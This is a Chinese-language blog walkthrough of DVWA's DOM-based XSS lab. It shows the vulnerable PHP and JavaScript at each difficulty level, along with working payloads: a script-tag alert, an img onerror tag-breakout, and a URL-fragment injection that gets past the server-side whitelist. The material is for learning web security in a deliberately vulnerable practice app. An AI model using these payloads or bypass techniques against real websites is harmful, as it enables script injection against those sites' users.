码迷,mamicode.com
首页 > 其他好文 > 详细

DVWA_XSS(DOM)

时间:2018-11-03 20:20:59      阅读:236      评论:0      收藏:0      [点我收藏+]

标签:存储   load   艺术   dex   作者   dom   alert   sid   oss   

 

XSS(DOM)是一种基于DOM树的一种代码注入攻击方式,可以是反射型的,也可以是存储型的,所以它一直被划分第三种XSS

与前两种XSS相比,它最大的特点就是不与后台服务器交互,只是通过浏览器的DOM树解析产生

除了js,flash等脚本语言也有可能存在XSS漏洞

关于DOM,墙裂推荐《JavaScriptDOM编程艺术》,写得真的很好

 

下面直接开始实践吧!(所有攻击都在火狐浏览器下进行的,谷歌做了XSS filter好烦、、、)

Low:

作者太皮了,居然没有做任何的防护和过滤

Payload:?default=<script>alert("You have been hacked!");</script>

 

Medium:

PHP脚本代码:

<?php 

// Is there any input? 
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ ‘default‘ ]) ) { 
    $default = $_GET[‘default‘]; 
     
    # Do not allow script tags 
    if (stripos ($default, "<script") !== false) { 
        header ("location: ?default=English"); 
        exit; 
    } 
} 

?>

 前端代码:

		<form name="XSS" method="GET">
			<select name="default">
				<script>
					if (document.location.href.indexOf("default=") >= 0) {
						var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
						document.write("<option value=‘" + lang + "‘>" + decodeURI(lang) + "</option>");
						document.write("<option value=‘‘ disabled=‘disabled‘>----</option>");
					}
					    
					document.write("<option value=‘English‘>English</option>");
					document.write("<option value=‘French‘>French</option>");
					document.write("<option value=‘Spanish‘>Spanish</option>");
					document.write("<option value=‘German‘>German</option>");
				</script>
			</select>
			<input type="submit" value="Select" />
		</form>

  此时作者对"<script>"标签做了过滤,只能尝试其他的标签了,比如<img>的onerror属性,即img引用出错时会执行onerror中的内容

Payload:?default=English>/option></select><img src=‘x‘ onerror=‘alert(1)‘>

注意要闭合了前面的标签,当然了,也可以URL编码之后在GET上去。

High:

<?php 

// Is there any input? 
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ ‘default‘ ]) ) { 

    # White list the allowable languages 
    switch ($_GET[‘default‘]) { 
        case "French": 
        case "English": 
        case "German": 
        case "Spanish": 
            # ok 
            break; 
        default: 
            header ("location: ?default=English"); 
            exit; 
    } 
} 

?>

  URL中#号之后的内容,不会被提交到服务器,可以直接与浏览器进行交互

Payload:?default=English#<script>alert(1)</script>

Impossbile:

  作者太皮了,居然只告诉我了这一句话:# Don‘t need to do anything, protction handled on the client side 

DVWA_XSS(DOM)

标签:存储   load   艺术   dex   作者   dom   alert   sid   oss   

原文地址:https://www.cnblogs.com/huangming-zzz/p/9901770.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!